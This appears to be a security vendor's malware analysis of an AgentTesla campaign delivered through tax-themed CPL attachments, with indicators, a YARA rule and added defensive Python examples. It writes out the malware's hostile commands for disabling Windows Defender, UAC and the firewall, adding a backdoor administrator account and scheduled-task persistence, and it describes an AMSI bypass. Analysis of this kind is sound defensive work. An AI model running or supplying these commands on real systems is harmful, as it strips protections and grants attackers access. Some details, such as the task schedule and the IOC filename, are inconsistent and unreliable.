AgentTesla Malware Targets Users with Malicious Control Panel File

Key Takeaways

  • The blog highlights a new infection chain for distributing the AgentTesla RAT. It involves a spam email with a CPL file that, when executed, downloads a PowerShell script that injects the AgentTesla malware into legitimate .NET framework executables (RegSvcs.exe and MSBuild.exe).
  • The PowerShell scripts use obfuscated binary strings to hide malicious code.
  • For persistence, malicious VBScripts are dropped into the Startup folder, and a new scheduled task is created.
  • A .NET-based loader is used to inject the AgentTesla payload into memory.

Executive Summary

Cyble Research and Intelligence Labs (CRIL) has recently observed an AgentTesla malware attack that employs a well-developed, multi-stage process. The campaign is designed to trick unsuspecting users into opening tax-related documents and the accompanying control panel (CPL) files.

The adversary leverages malicious CPL files to execute malicious PowerShell scripts and utilizes a custom obfuscated .NET loader to inject the AgentTesla payload.

During the investigation, we discovered a malicious email with the subject Gorgees Ghada shared “” with you. This email contains an attached archive file, which includes two files, a PDF and a CPL file, namely Gorgees_Ghada_Tax 2021.pdf and Gorgees_Ghada_Tax 2021.cpl.

This CPL file executes a PowerShell script to download another file from the URL hxxp://cawp1[.]blogspot[.]com/atom.xml. This newly downloaded file contains a .NET loader that injects the AgentTesla remote access trojan (RAT) into system processes.

The figure below shows the spam email.

Figure 1 – Spam Email

AgentTesla is a .NET-based information stealer that infiltrates computers and exfiltrates sensitive information. Its main focus is the credentials and personal information of victims. Additionally, AgentTesla has capabilities such as keylogging, stealing clipboard data, file system access, and data exfiltration to the Command and Control (C&C) server.

Technical Details

The attack lifecycle comprises several distinct stages, each serving a specific purpose to achieve its goals. These stages encompass various techniques and methodologies to facilitate initial infection, establish persistence on the targeted system, evade detection by security measures, and employ process injection for further advancements.

The figure below shows the AgentTesla infection chain.

Figure 2 – AgentTesla Infection Chain

Initial Infection

The email attachment contains a malicious file named Gorgees_Ghada_Tax 2021.cpl. It is a CPL file. The SHA256 hash of this file is 72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303.

During our analysis, only three security vendors detected this malicious file, as shown in the figure below.

Figure 3 – Anti Virus Vendor Detection for Malicious CPL File

The Gorgees_Ghada_Tax 2021.cpl file operates similarly to a regular executable, requiring only a double-click to initiate its execution. Within this file lies PowerShell code responsible for fetching a malicious PowerShell script from the hardcoded URL cawp1[.]blogspot[.]com/atom.xml and subsequently executing it through powershell.exe.

The figure below shows the code for downloading and executing the script.

Figure 4 – PowerShell Code Executed by CPL

The downloaded PowerShell script contains several obfuscated binary strings. Various binary substrings are replaced with special characters such as ‘*’ and ‘_’ for obfuscation. Once the script is executed, PowerShell deobfuscates the strings by replacing the special characters with their original binary substrings, thereby revealing the actual content of the binary strings. Subsequently, these deobfuscated binary strings are transformed into additional PowerShell scripts, an executable, and a DLL file.

The figure below shows the downloaded malicious script.

Figure 5 – Powershell Script Downloaded by the CPL File

After being executed, the malicious PowerShell script drops three scripts into the C:\ProgramData\phuddiupdate directory: AdobeUpdates.vbs, Clang.vbs, and Se**logy.!!!!!!!!!!!!!!!!. These scripts facilitate a series of malicious actions, which are elaborated on in the subsequent sections.

The figure below shows the files dropped by the malicious PowerShell script.

Figure 6 – Scripts Dropped by the Malicious Powershell Script

Payload Injection

Within the script “Se**logy.!!!!!!!!!!!!!!!!”, two binary string variables, namely “BigBOSS” and “s**ybunbun”, are concealed through obfuscation. The variable BigBOSS corresponds to an obfuscated AgentTesla executable, while the variable “s**ybunbun” conceals yet another obfuscated PowerShell script.

The figure below shows the contents of the “Se**logy.!!!!!!!!!!!!!!!!” file.

Figure 7 – Contents of the Dropped Sology.~!!!!!!!!!!!!!!!!~ File

Subsequently, the PowerShell script deobfuscates the string variable “s**ybunbun” and executes the underlying PowerShell script. This deobfuscated script includes a .NET-based loader DLL, which is once again concealed in binary string format. The script deobfuscates the binary string and then converts it into a byte array to obtain the actual loader.

The figure below shows the script code that creates a byte array from the binary string.

Figure 8 – Script to Deobfuscate .NET Loader
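As an added example, not code from the Cyble write-up or from the malware itself, the following Python routine shows how an analyst can reverse the binary-string obfuscation described above (placeholder characters such as ‘*’ and ‘_’ standing in for runs of bits) and turn the result into a byte array; the placeholder-to-bits mapping and the sample string are constructed assumptions, since the real script carries its own mapping.

```python
# Added example (not from the Cyble write-up): decode an obfuscated binary string
# in which runs of bits were replaced by placeholder characters, then convert the
# recovered 0/1 string into bytes. PLACEHOLDERS is an assumed mapping for illustration.
import re

# Assumed mapping: each placeholder stands for one fixed run of bits.
PLACEHOLDERS = {"*": "0100", "_": "1101"}


def expand_placeholders(obfuscated: str, mapping: dict[str, str] = PLACEHOLDERS) -> str:
    """Put the original bit runs back in place of each placeholder character."""
    bits = obfuscated
    for token, run in mapping.items():
        bits = bits.replace(token, run)
    bits = re.sub(r"\s+", "", bits)  # whitespace is only a visual separator
    if not re.fullmatch(r"[01]*", bits):
        raise ValueError("unexpected characters remain after placeholder expansion")
    if len(bits) % 8:
        raise ValueError(f"bit string length {len(bits)} is not a multiple of 8")
    return bits


def binary_string_to_bytes(bits: str) -> bytes:
    """Convert a string of 0/1 characters into a byte array, 8 bits per byte."""
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def decode_payload(obfuscated: str) -> tuple[bytes, str]:
    """Decode and classify the result: a PE image (MZ header) or text such as a script."""
    data = binary_string_to_bytes(expand_placeholders(obfuscated))
    if data.startswith(b"MZ"):
        kind = "PE image (executable or DLL)"
    else:
        try:
            data.decode("ascii")
            kind = "text (likely a further PowerShell script)"
        except UnicodeDecodeError:
            kind = "unknown binary"
    return data, kind


# Constructed sample: 'M' (01001101) and 'Z' (01011010), with the first byte's
# two bit runs replaced by the placeholders.
SAMPLE = "*_ 01011010"

if __name__ == "__main__":
    payload, kind = decode_payload(SAMPLE)
    print(payload, kind)
```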

Upon generating the .NET loader binary, the script initializes a designated method, C, within namespace A and Class B of the .NET loader.

The figure below shows the method C of the .NET Loader DLL file.

Figure 9 – Method C of .NET Loader DLL

This DLL then performs process injection, injecting the AgentTesla executable into three distinct executables located under C:\Windows\Microsoft.NET\Framework: \v4.0.30319\RegSvcs.exe, \v2.0.50727\RegSvcs.exe, and \v3.5\Msbuild.exe.

This process injection is accomplished by utilizing the Invoke method within the script, as shown below.

Figure 10 – Script Performing Process Injection

The ultimate injected payload is a 32-bit variant of the AgentTesla malware, with a SHA256 hash of 54ccee6fa601b22fc17e00f7bf48c9d33f103ea1d3ba6cc86986bfe19a624b4e.

Persistence

The malware employs both scheduled tasks and the Startup folder in its attempts to establish persistence. Within the downloaded PowerShell script, the command schtasks /create /sc MINUTE /mo 200 /tn EWxdwwATE /F /tr "$KILKGGKGK C:\ProgramData\phuddiupdate\AdobeUpdates.vbs" is present. This command creates a scheduled task entry in the Task Scheduler, specifying that the script AdobeUpdates.vbs located at C:\ProgramData\phuddiupdate will be executed on a daily basis without a specific end date.

The figure below shows the task scheduler entry.


Figure 11 – Task Scheduler Entry for Persistence

Furthermore, to enhance its persistence, the PowerShell script drops two scripts, AdobeUpdates.vbs and Clang.vbs, into the system’s Startup folder. The Startup folder is scanned when the operating system starts, and any files within it are executed as part of the initialization process.

The figure below shows the start-up folder.

Figure 12 – Startup Entry for Persistence

Both scripts, AdobeUpdates.vbs and Clang.vbs, share the same code, differing solely in their download URLs. Each script encapsulates a PowerShell command intended for execution: the VBScripts run a PowerShell command that downloads the malicious payload from the hardcoded URL every time the system starts or at the time specified in the scheduled task entry.

The figure below shows the complete code of the AdobeUpdates.vbs.

Figure 13 – Contents of the AdobeUpdates.vbs Script

Defense Evasion

In order to evade detection mechanisms, the initial PowerShell script utilizes an encoded binary string variable named AMSISSISISI. Within this variable, two binary strings are embedded, accompanied by code that stops the Windows Defender services and bypasses the Antimalware Scan Interface (AMSI).

The figure below shows the deobfuscated string AMSISSISISI.

Figure 14 – Script to Disable Windows Defender

The variable AMI is an AMSI bypass script that tries to disable AMSI’s “amsiInitFailed” check by manipulating non-public, static fields in the “System.Management.Automation.AmsiUtils” class.

The figure below shows the PowerShell command used to bypass AMSI.

Figure 15 – PowerShell for AMSI Bypass

Another variable, DEF, is a PowerShell script that manipulates Windows Defender settings. The script adds exclusions for extensions, paths, processes and IP addresses, and alters other Windows Defender settings.

Excluded Extensions: .bat, .ppam, .xls, .docx, .bat, .exe, .vbs, .js.

Excluded Path: C:\, D:\ and E:\.

Excluded Processes: explorer.exe, kernel32.dll, aspnet_compiler.exe, cvtres.exe, CasPol.exe, csc.exe, Msbuild.exe, ilasm.exe, InstallUtil.exe, jsc.exe, Calc.exe, powershell.exe, rundll32.exe, conhost.exe, Cscript.exe, mshta.exe, cmd.exe, DefenderisasuckingAntivirus and wscript.exe.

The script modifies the following Windows Defender settings to impair defenses:

  • Add-MpPreference -ExclusionIpAddress
  • Add-MpPreference -ThreatIDDefaultAction_Actions 6
  • Add-MpPreference -AttackSurfaceReductionRules_Ids 0
  • Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  • Set-MpPreference -EnableControlledFolderAccess Disabled
  • Set-MpPreference -PUAProtection disable
  • Set-MpPreference -HighThreatDefaultAction 6 -Force
  • Set-MpPreference -ModerateThreatDefaultAction 6
  • Set-MpPreference -LowThreatDefaultAction 6
  • Set-MpPreference -SevereThreatDefaultAction 6
  • Set-MpPreference -ScanScheduleDay 8

Additionally, the script executes the following commands (command followed by its description):

  • New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force – PowerShell command to disable User Account Control (UAC) on the system.
  • Stop-Service -Name WinDefend -Confirm:$false -Force – PowerShell command that forcefully stops the Windows Defender service without asking for confirmation and without waiting for dependent services or tasks to finish.
  • Set-Service -Name WinDefend -StartupType Disabled – Command that prevents the WinDefend service from automatically starting when the system starts up.
  • net user System32 /add – Command to create a new user account with the username “System32”.
  • net user System32 123 – Sets the password for the user account with the username “System32” to “123”.
  • net localgroup administrators System32 /add – Adds “System32” to the “Administrators” local group on the system.
  • net localgroup “Remote Desktop Users” System32 /add – Adds the account “System32” to the “Remote Desktop Users” local group on the system.
  • net stop WdNisSvc – Stops the Windows Defender Network Inspection Service (WdNisSvc).
  • sc delete windefend – Permanently deletes the “windefend” service.
  • netsh advfirewall set allprofiles state off – Turns off the Windows Firewall for all network profiles on the system.
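As an added example, not part of the Cyble write-up, the following Python audit checks a Windows Defender preference snapshot for the specific tampering listed above (realtime and script scanning disabled, threat default actions set to 6 / allow, whole-drive path exclusions, and script hosts or .NET build tools excluded from scanning). The snapshot is a constructed dictionary shaped like the properties Get-MpPreference reports; collecting it from a live host (for example with Get-MpPreference | ConvertTo-Json) is assumed and not shown.

```python
# Added example (not from the Cyble write-up): audit a Defender preference snapshot
# for the settings this campaign changes. SAMPLE_PREFS is a constructed dictionary
# modelled on Get-MpPreference output; the property names are Defender's own.
from typing import Any

# Values that indicate a protection was switched off (enum values per Get-MpPreference).
DISABLED_PROTECTIONS = {
    "DisableRealtimeMonitoring": True,
    "DisableIOAVProtection": True,
    "DisableScriptScanning": True,
    "DisableIntrusionPreventionSystem": True,
    "MAPSReporting": 0,          # 0 = Disabled
    "SubmitSamplesConsent": 2,   # 2 = NeverSend
    "PUAProtection": 0,          # 0 = Disabled
}
THREAT_ACTION_FIELDS = ("LowThreatDefaultAction", "ModerateThreatDefaultAction",
                        "HighThreatDefaultAction", "SevereThreatDefaultAction")
# Script hosts and .NET build tools that the campaign excludes from scanning.
SUSPICIOUS_PROCESS_EXCLUSIONS = {"powershell.exe", "wscript.exe", "cscript.exe",
                                 "mshta.exe", "msbuild.exe", "rundll32.exe"}


def audit_defender_preferences(prefs: dict[str, Any]) -> list[str]:
    """Return one finding per tampered setting; an empty list means none were seen."""
    findings = []
    for name, bad_value in DISABLED_PROTECTIONS.items():
        if prefs.get(name) == bad_value:
            findings.append(f"{name} set to {bad_value!r}")
    for name in THREAT_ACTION_FIELDS:
        if prefs.get(name) == 6:  # 6 = Allow: detections are never acted on
            findings.append(f"{name} set to 6 (allow)")
    for path in prefs.get("ExclusionPath") or []:
        root = path.rstrip("\\")
        if len(root) == 2 and root[1] == ":":  # e.g. "C:\" excludes the whole drive
            findings.append(f"whole-drive exclusion: {path}")
    for proc in prefs.get("ExclusionProcess") or []:
        if proc.lower() in SUSPICIOUS_PROCESS_EXCLUSIONS:
            findings.append(f"script host or build tool excluded: {proc}")
    return findings


# Constructed snapshot reproducing a subset of the settings the script applies.
SAMPLE_PREFS = {
    "DisableRealtimeMonitoring": True, "DisableScriptScanning": True,
    "MAPSReporting": 0, "SubmitSamplesConsent": 2, "HighThreatDefaultAction": 6,
    "ExclusionPath": ["C:\\", "D:\\", "E:\\"],
    "ExclusionProcess": ["explorer.exe", "powershell.exe", "Msbuild.exe"],
}

if __name__ == "__main__":
    for line in audit_defender_preferences(SAMPLE_PREFS):
        print("FINDING:", line)
```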

The figure below shows the script to impair defense.

Figure 16 – Script Code to Manipulate Windows Defender Settings

The figure below shows the process tree of the AgentTesla Infection.

Figure 17 – AgentTesla Process Tree

Conclusion

The observed malware campaign demonstrates a sophisticated, multi-stage attack strategy. By disguising malicious content as a seemingly legitimate program, the adversaries aim to lure unsuspecting users into activating weaponized control panel files that execute PowerShell scripts and load the AgentTesla malware. A successful AgentTesla infection allows attackers to steal data and execute commands on compromised systems, posing significant security risks. Vigilance and robust security measures are imperative to combat this threat.

Our Recommendations

  • Implement strong email filtering solutions to detect and block spam emails, phishing attempts, and malicious attachments.
  • Refrain from opening untrusted links and email attachments without verifying their authenticity.
  • Use a reputed antivirus and Internet security software package on your connected devices, including PC, laptop, and mobile.

MITRE ATT&CK® Techniques

Tactic  Technique ID  Technique Name
Initial Access  T1566  Phishing
Execution  T1059  Command and Scripting Interpreter
Execution  (not listed)  User Execution
Persistence  T1547.001  Startup Folder
Persistence  (not listed)  Scheduled Task/Job: Scheduled Task
Defense Evasion  T1140  Deobfuscate/Decode Files or Information
Defense Evasion  (not listed)  Impair Defenses: Disable or Modify Tools
Defense Evasion  (not listed)  Impair Defenses: Disable or Modify System Firewall
Defense Evasion  (not listed)  Impair Defenses: Indicator Blocking
Defense Evasion  (not listed)  Impair Defenses: Disable or Modify Cloud Firewall
Command and Control  T1071  Application Layer Protocol

Indicators of Compromise (IOCs)

Indicators  Indicator Type  Details
Gorgees_Ghada_Tax 2022.cpl
cawp1[.]blogspot[.]com/atom.xml  URL  PowerShell script
.NET loader

Yara Rules

rule AgentTesla_CPL_Downloader
{
    meta:
        author = "Cyble"
        description = "Detects AgentTesla CPL Downloader Files"
        date = "2023-08-08"
        os = "Windows"
        threat_name = "AgentTesla"
        severity = 100
        reference_sample = "72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303"

    strings:
        $a = "'"
        $b = "-ExecutionPolicy Bypass -c \"%s\""
        $c = "('{1}{0}'-f'calc','i').replace('calc','eX')"

    condition:
        all of them
}


Detection Guidance:

Due to its association with downloading harmful PowerShell code from the “” URL pattern, it is recommended to implement a security rule that halts the execution of PowerShell.exe when the strings “'” and “.replace(‘calc’,’eX’)” are present in the PowerShell command line. This restriction should be enforced only when the PowerShell.exe process originates from rundll32.exe, with the rundll32.exe process itself initiated by control.exe.
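As an added example, not part of the Cyble guidance itself, the following Python code applies the rule above to process-creation telemetry: it flags powershell.exe whose parent is rundll32.exe under control.exe and whose command line carries the .replace(‘calc’,’eX’) marker. The event field names and the sample events are constructed assumptions to be mapped onto your own telemetry (for example Sysmon event ID 1); only the .replace() marker is used, since the other string in the guidance is a single quote.

```python
# Added example (not from the Cyble write-up): detection logic for the guidance above,
# run over constructed process-creation events. Field names are assumptions.
import os

MARKERS = (".replace('calc','ex')",)  # compared case-insensitively


def _name(image: str) -> str:
    """Lower-case base name of an image path, accepting Windows separators."""
    return os.path.basename(image.replace("\\", "/")).lower()


def lineage(events: list[dict], pid: int) -> list[str]:
    """Image names from the given process up to the root, following ppid links."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect_cpl_powershell_chain(events: list[dict]) -> list[int]:
    """PIDs of powershell.exe started by rundll32.exe under control.exe with a marker."""
    hits = []
    for e in events:
        if _name(e["image"]) != "powershell.exe":
            continue
        cmd = e.get("cmdline", "").lower()
        if not any(m in cmd for m in MARKERS):
            continue
        chain = lineage(events, e["pid"])
        if chain[1:3] == ["rundll32.exe", "control.exe"]:  # parent and grandparent
            hits.append(e["pid"])
    return hits


# Constructed events: a CPL run via control.exe -> rundll32.exe -> powershell.exe,
# plus a powershell.exe started from explorer.exe that contains the same string.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\control.exe",
     "cmdline": "control.exe <PLACEHOLDER>.cpl"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL <PLACEHOLDER>.cpl"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -c \"('{1}{0}'-f'calc','i').replace('calc','eX')\""},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c \"'x'.replace('calc','eX')\""},
]

if __name__ == "__main__":
    print("suspicious powershell PIDs:", detect_cpl_powershell_chain(SAMPLE_EVENTS))
```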

Disclaimer: The provided detection guidance rules are purely illustrative and should not be directly implemented in a production environment without proper testing, validation, and consideration of potential impacts on system performance and security. Always exercise caution when implementing security rules or policies, and ensure you fully understand the consequences of any changes made to your system or network.
